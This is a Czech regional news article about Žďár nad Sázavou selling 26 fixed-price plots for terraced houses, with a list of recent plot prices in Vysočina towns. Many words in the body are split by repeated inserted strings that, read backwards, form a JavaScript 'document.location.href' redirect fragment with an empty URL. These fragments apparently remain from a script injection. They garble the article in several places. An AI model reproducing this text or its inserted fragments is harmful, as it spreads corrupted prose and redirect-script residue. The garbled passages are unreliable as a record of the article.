Rainbow page separator

Parcely na řadovky budou za téměř dva tisíce za metr čtvereční

Úterý, 8. srpna 2017

Žďár nad Sázavou / Celkem 26 pozemků nabízí žďárská radnice zájemcům o stavbu řadových domků v nové ulici Barvířská v lokalitě Klafar. Prodej, který se uskuteční na podzim (přihlášky je možné podávat od 2. do 30. října), nebude probíhat prostřednictvím elektronické aukce, jako [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu bylo u předchozích parcel pro výstavbu rodinných domů, ale za předem stanovenou cenu. Ta nepřesáhne dva tisíce korun za metr čtvereční zasíťovaného pozemku, který má mít rozlohu 400 až 600 metrů čtverečních a dvanáctimetrovou šířku. Informativní schůzka se v městském úřadě uskuteční 8. září od 17 hodin. „Chtěli jsme vyjít vstříc lidem, kteří dlouhodobě kritizovali, že měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to prodává pozemky jenom aukcí, takže na ceny nemají šanci dosáhnout,“ sdělil starosta Žďáru Zdeněk Navrátil.
Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to za přípravu infrastruktury le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos vydá asi dvacet milionů korun a příští rok zhruba také [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolik. Výstavba řadových domků začne za předpokladu, že kupci projeví zájem o minimálně 18 pozemků z celkových 26. Podle vedení města výtěžek z prodeje parcel nepokryje ani náklady na jejich vybavení inženýrskými sítěmi.
Stavební parcely ve Žďáře jsou dražší než v okolích obcích. Ve většině měst na Vysočině dávají přednost přípravě parcel pro samostatné rodinné domy, o které je ze strany stavebníků obecně větší zájem než o řadovou výstavbu. Liší se prodejní ceny pozemků – někde jde o pevně stanovenou cenu za metr čtvereční, jinde o obálkovou me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];todu, prodej prostřednictvím aukce či jednotnou cenu za pozemek bez ohledu na rozměr. Některé parcely ve městech a obcích Vysočiny stavebníky „svazují“ regulativy, u jiných záleží jen za fantazii a solventnosti majitele.

Za kolik se v poslední době prodávaly parcely na Vysočině?

  • Polná od 1221 Kč/m2, rodinné domky
  • Jihlava 1620 – 1800 Kč/m2, rodinné domky
  • Třešť 1000 Kč/m2, řadovky
  • Chotěboř 700 Kč/m2, rodinné domky
  • Havl. Brod od 1147 Kč/m2, rodinně domky
  • Třebíč od 1620 Kč/m2, rodinné domky
  • Žďár n. S. od 1200 Kč/m2, rodinné domky
  • Svratka 300 Kč/m2 + DPH, rodinné domky